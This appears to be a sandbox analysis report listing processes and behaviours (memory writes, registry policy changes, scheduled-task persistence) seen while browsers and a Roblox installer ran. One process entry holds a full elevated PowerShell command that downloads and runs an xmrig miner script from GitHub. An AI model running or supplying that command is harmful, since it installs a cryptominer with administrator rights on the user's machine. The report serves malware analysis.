PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\LaunchWinApp.exe

"C:\Windows\system32\LaunchWinApp.exe" "http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.0.253263564\1666715509" -parentBuildID 20221007134813 -prefsHandle 1736 -prefMapHandle 1716 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0b1bc83-3f1d-4686-8068-cb4024606cd8} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 1824 20cfe9ce158 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.1.2105767407\1393510733" -parentBuildID 20221007134813 -prefsHandle 2168 -prefMapHandle 2156 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eff2cd15-9b23-46a3-9cff-769ca4695bf4} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 2180 20cfe8fb358 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.2.1072239049\118926637" -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 20866 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d4b5d16-f731-455b-b64c-a9aeda37f31c} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3136 20c87311558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.3.1333361495\869113507" -childID 2 -isForBrowser -prefsHandle 3396 -prefMapHandle 3376 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07302cb8-e27d-49af-a573-06849357c768} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3408 20c877dab58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.4.1818201270\1027860085" -childID 3 -isForBrowser -prefsHandle 4336 -prefMapHandle 4324 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5539895-a374-4540-97db-07a54d9f5c89} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3456 20c88383c58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.5.1089039125\1913300989" -childID 4 -isForBrowser -prefsHandle 2624 -prefMapHandle 4832 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48f6a0e0-2593-43ae-827b-b70ebd43c0eb} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 4812 20c895e6558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.6.901914592\1157740721" -childID 5 -isForBrowser -prefsHandle 5056 -prefMapHandle 5060 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a951b25-98a4-4879-94eb-9ff815ffedd9} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5048 20c8a226858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.7.508253332\1059688177" -childID 6 -isForBrowser -prefsHandle 5240 -prefMapHandle 5244 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1b9deee-dadd-4bdc-9f4b-e0dee4e52a84} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5236 20c8a225058 tab

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffde1649758,0x7ffde1649768,0x7ffde1649778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2988 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4528 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4700 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4772 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffde1649758,0x7ffde1649768,0x7ffde1649778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1528 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2056 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2860 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2872 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4488 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4496 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4764 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4640 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5180 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3452 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3160 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5860 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1672 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=812 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4736 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5596 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe

"C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:8

C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe

MicrosoftEdgeWebview2Setup.exe /silent /install

C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjVENzYwMzgtOTYzMS00MUI3LTk4NjQtMkExMUQ3N0QzRkJGfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InswNzcwMzIyOS01ODY5LTQ3NzUtQjJCMS1DMzNDMTgwQjU5RjJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxLjMuMTcxLjM5IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NTAwNTQxNjQwIiBpbnN0YWxsX3RpbWVfbXM9IjgxNSIvPjwvYXBwPjwvcmVxdWVzdD4

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{25D76038-9631-41B7-9864-2A11D77D3FBF}" /silent

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

